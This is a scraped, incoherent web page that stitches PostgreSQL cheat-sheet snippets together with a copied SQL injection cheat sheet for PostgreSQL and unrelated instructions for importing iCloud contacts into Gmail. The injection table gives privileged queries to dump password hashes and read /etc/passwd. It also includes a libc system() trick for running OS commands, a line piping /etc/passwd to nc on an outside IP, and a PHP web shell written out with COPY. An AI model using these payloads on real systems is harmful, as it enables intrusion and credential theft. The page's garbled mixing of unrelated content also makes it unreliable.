Postgresql Queries Cheat Sheet



Oracle Linux Virtualization Manager (OLVM) Engine PostgreSQL Database Queries Cheat Sheet. This post will explain some practical psql commands and describe how to run the PostgreSQL queries from the command line to get useful information from the engine database.

  • Postgresql Cheat Sheet PostgreSQL also known as Postgres, is a free and open-source relational database management system (RDBMS) emphasizing extensibility and SQL compliance.
  • PostgreSQL Cheat Sheet CREATE DATABASE CREATE DATABASE dbName; CREATE TABLE (with auto numbering integer id) CREATE TABLE tableName ( id serial PRIMARY KEY, name varchar(50) UNIQUE NOT NULL, dateCreated timestamp DEFAULT currenttimestamp ); Add a primary key ALTER TABLE tableName ADD PRIMARY KEY (id); Create an INDEX.
  • Connect to a specific database. For example, the following command connects to the 'employees'.
  • The PostgreSQL cheat sheet page provides you with the common PostgreSQL commands and statements that enable you to work with PostgreSQL quickly and effectively.

Some useful syntax reminders for SQL Injection into PostgreSQL databases…

This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet. Microsoft 365 sharepoint login.

The complete list of SQL Injection Cheat Sheets I’m working is:

I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.

Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query.

VersionSELECT version()
CommentsSELECT 1; –comment
SELECT /*comment*/1;
Current UserSELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();
List UsersSELECT usename FROM pg_user
List Password HashesSELECT usename, passwd FROM pg_shadow — priv
Password CrackerMDCrack can crack PostgreSQL’s MD5-based passwords.
List PrivilegesSELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
List DBA AccountsSELECT usename FROM pg_user WHERE usesuper IS TRUE
Current DatabaseSELECT current_database()
List DatabasesSELECT datname FROM pg_database
List ColumnsSELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE ‘public’)
List TablesSELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN (‘r’,”) AND n.nspname NOT IN (‘pg_catalog’, ‘pg_toast’) AND pg_catalog.pg_table_is_visible(c.oid)
Find Tables From Column NameIf you want to list all the table names that contain a column LIKE ‘%password%’:SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE ‘public’) AND attname LIKE ‘%password%’;
Select Nth RowSELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; — rows numbered from 0
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;
Select Nth CharSELECT substr(‘abcd’, 3, 1); — returns c
Bitwise ANDSELECT 6 & 2; — returns 2
SELECT 6 & 1; –returns 0
ASCII Value -> CharSELECT chr(65);
Char -> ASCII ValueSELECT ascii(‘A’);
CastingSELECT CAST(1 as varchar);
SELECT CAST(’1′ as int);
String ConcatenationSELECT ‘A’ || ‘B’; — returnsAB
If StatementIF statements only seem valid inside functions, so aren’t much use for SQL injection. See CASE statement instead.
Case StatementSELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; — returns A
Avoiding QuotesSELECT CHR(65)||CHR(66); — returns AB
Time DelaySELECT pg_sleep(10); — postgres 8.2+ only
CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS ‘/lib/libc.so.6′, ‘sleep’ language ‘C’ STRICT; SELECT sleep(10); –priv, create your own sleep function. Taken from here .
Make DNS RequestsGenerally not possible in postgres. However if contrib/dblinkis installed (it isn’t by default) it can be used to resolve hostnames (assuming you have DBA rights):

Alternatively, if you have DBA rights you could run an OS-level command (see below) to resolve hostnames, e.g. “ping pentestmonkey.net”.

Command ExecutionCREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS ‘/lib/libc.so.6′, ‘system’ LANGUAGE ‘C’ STRICT; — privSELECT system(‘cat /etc/passwd | nc 10.0.0.1 8080′); — priv, commands run as postgres/pgsql OS-level user
Local File AccessCREATE TABLE mydata(t text);
COPY mydata FROM ‘/etc/passwd’; — priv, can read files which are readable by postgres OS-level user
…’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1; — get data back one row at a time
…’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2; — get data back one row at a time …
DROP TABLE mytest mytest;Write to a file:

CREATE TABLE mytable (mycol text);
INSERT INTO mytable(mycol) VALUES (‘<? pasthru($_GET[cmd]); ?>’);
COPY mytable (mycol) TO ‘/tmp/test.php’; –priv, write files as postgres OS-level user. Generally you won’t be able to write to the web root, but it’s always work a try.
– priv user can also read/write files by mapping libc functions

Hostname, IP AddressSELECT inet_server_addr(); — returns db server IP address (or null if using local connection)
SELECT inet_server_port(); — returns db server IP address (or null if using local connection)
Create UsersCREATE USER test1 PASSWORD ‘pass1′; — priv
CREATE USER test1 PASSWORD ‘pass1′ CREATEUSER; — priv, grant some privs at the same time
Drop UsersDROP USER test1; — priv
Make User DBAALTER USER test1 CREATEUSER CREATEDB; — priv
Location of DB filesSELECT current_setting(‘data_directory’); — priv
SELECT current_setting(‘hba_file’); — priv
Default/System Databasestemplate0
template1

Tags: cheatsheet, database, pentest, postgresql, sqlinjection

Postgresql queries cheat sheet example

Postgresql Command Line Cheat Sheet

Posted in SQL Injection

Import Contacts to Google from iCloud. Visit www.gmail.com and log in with your Google ID. Click on 'More' and click on the 'Import' option that appears. Choose the VCard file that you have already downloaded onto your PC. Log in to iCloud from your PC or Mac then click on Contacts Click on Settings Export VCard and save it on your computer Open your Gmail account on your PC or Mac Click on Contacts then More. If your account has Screen Time communication limits turned on, you may not be able to add new contacts. See If you can’t create, import, edit, or delete contacts on iCloud.com. You can also add a contact in iCloud Mail. See Save and find email addresses in Mail on iCloud.com. Step 1: Sign into iCloud at icloud.com using your Apple ID and password, and select “Contacts”. Step 2: Click on the setting icon on the bottom left corner of the page, and select “import vCard” to import the. Step 1: Download the app from the Apple Store here: (or search for “Contacts Sync for Google Gmail” on the Mac App Store) Step 2: The first thing you need to do is enter your account details for your Google account and your Mac iCloud account. How to put gmail contacts on icloud.

Psql Create Table Cheat Sheet